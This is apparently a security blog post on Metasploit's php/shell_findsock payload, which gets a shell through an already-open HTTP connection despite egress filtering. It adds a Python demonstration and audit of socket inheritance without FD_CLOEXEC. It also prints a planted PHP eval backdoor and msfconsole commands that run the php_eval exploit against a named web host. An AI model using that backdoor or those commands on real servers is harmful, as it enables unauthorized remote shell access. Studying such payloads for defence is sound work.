A good firewall setup has ingress and egress filtering. On a new setup, I like to set very strict rules for incoming and outgoing traffic. When setting up a new LAMP server etc., making sure it can only connect out to the places it needs access to is good security practice. Then open port 80 for connections from the world, minus .ru and .cn etc. 🙂
So I thought…
Then egypt, from Metasploit, wrote and introduced me to the "php/shell_findsock" payload, which I think is awesome!
If you can get the LAMP server to execute the shell_findsock payload in some way, you can in many cases get a shell over the already established HTTP connection! You can also use the payload with the other PHP exploits in the framework.
egypt states that "this payload leaves conspicuous evil-looking entries in the apache error logs", but I did not get any on my Debian Etch test server. On my Ubuntu Intrepid, however, I got:
sh: Syntax error: Bad fd number
Invalid method in request exit
egypt also states: “The issue this payload takes advantage of (CLOEXEC flag not set on sockets) appears to have been patched on the Ubuntu version of Apache”
My test on a plain fresh install of Ubuntu 8.10 (Intrepid Ibex) shows that it works.
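The payload relies on a plain POSIX fact: a file descriptor without FD_CLOEXEC survives exec(), so a shell spawned by PHP inherits Apache's client socket and can talk to the browser through it. The script below is an added example, not code from this post or from Metasploit; it reproduces the inheritance with a socketpair and an exec'd child, and includes the audit a defender can run to list sockets in a process that would leak the same way. It assumes Linux (/proc/self/fd) and Python 3.4 or newer (os.set_inheritable).

```python
"""Added example (not from the original post or from Metasploit itself).

shell_findsock works because the web server's accepted client socket has no
FD_CLOEXEC flag, so every child process PHP spawns inherits that socket.
This script shows the mechanism with a socketpair and an exec'd child, and
gives a defender's audit that lists sockets in the current process that
would leak across exec. Assumes Linux (/proc/self/fd) and Python 3.4+.
"""
import fcntl
import os
import socket
import stat
import subprocess
import sys

# Probe run in the child after exec: exit 0 only if the inherited fd number
# is still open *and* still a socket (a re-used number that now refers to
# some other file does not count as a leak).
_PROBE = (
    "import os, stat, sys\n"
    "fd = int(sys.argv[1])\n"
    "try:\n"
    "    ok = stat.S_ISSOCK(os.fstat(fd).st_mode)\n"
    "except OSError:\n"
    "    ok = False\n"
    "sys.exit(0 if ok else 1)\n"
)


def fd_survives_exec(close_on_exec: bool) -> bool:
    """Create a socket, exec a child, report whether the child can still use it.

    close_on_exec=False reproduces the Apache weakness the payload relies on;
    close_on_exec=True is the fix (FD_CLOEXEC set on the accepted socket).
    """
    a, b = socket.socketpair()
    fd = a.fileno()
    # Python marks new fds non-inheritable by default (PEP 446), so set the
    # flag explicitly for both cases.
    os.set_inheritable(fd, not close_on_exec)
    # close_fds=False lets the kernel decide purely from FD_CLOEXEC, exactly
    # as it does when Apache/PHP spawns /bin/sh.
    result = subprocess.run(
        [sys.executable, "-c", _PROBE, str(fd)], close_fds=False, check=False
    )
    a.close()
    b.close()
    return result.returncode == 0


def inheritable_socket_fds() -> list:
    """Defender's audit: socket fds in this process that lack FD_CLOEXEC."""
    leaked = []
    for name in os.listdir("/proc/self/fd"):  # Linux-specific (assumption)
        fd = int(name)
        try:
            st = os.fstat(fd)
            flags = fcntl.fcntl(fd, fcntl.F_GETFD)
        except OSError:
            continue  # listdir's own directory fd is already closed
        if stat.S_ISSOCK(st.st_mode) and not flags & fcntl.FD_CLOEXEC:
            leaked.append(fd)
    return leaked


def audit_demo() -> tuple:
    """Return (flagged_when_inheritable, flagged_after_fix) for one socket."""
    s = socket.socket()
    fd = s.fileno()
    os.set_inheritable(fd, True)       # the weak state: socket leaks to children
    before = fd in inheritable_socket_fds()
    os.set_inheritable(fd, False)      # the fix: FD_CLOEXEC on the server socket
    after = fd in inheritable_socket_fds()
    s.close()
    return before, after


if __name__ == "__main__":
    print("socket survives exec without FD_CLOEXEC:", fd_survives_exec(False))
    print("socket survives exec with FD_CLOEXEC:   ", fd_survives_exec(True))
    print("audit (flagged before fix, flagged after fix):", audit_demo())
```

Run it as a plain script: the first line prints True (the child still holds a usable socket), the second False, and the audit flags the socket only while it is inheritable. The same F_GETFD check, applied to a real server's descriptor table from a child it spawns, tells you whether that server is still exposed to this class of payload.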
In the test case, I left my "backdoor" on the server in test.php with the code <?php eval($_GET['evalme']); ?>, which would be the default for this Metasploit setup.
msf > use exploit/unix/webapp/php_eval
msf exploit(php_eval) > set PAYLOAD php/shell_findsock
msf exploit(php_eval) > set RHOST http://www.gamelinux.org
msf exploit(php_eval) > exploit
And you thought that you were safe!
On my Debian Etch, the suhosin patch stopped the attack, but not on my Ubuntu Intrepid.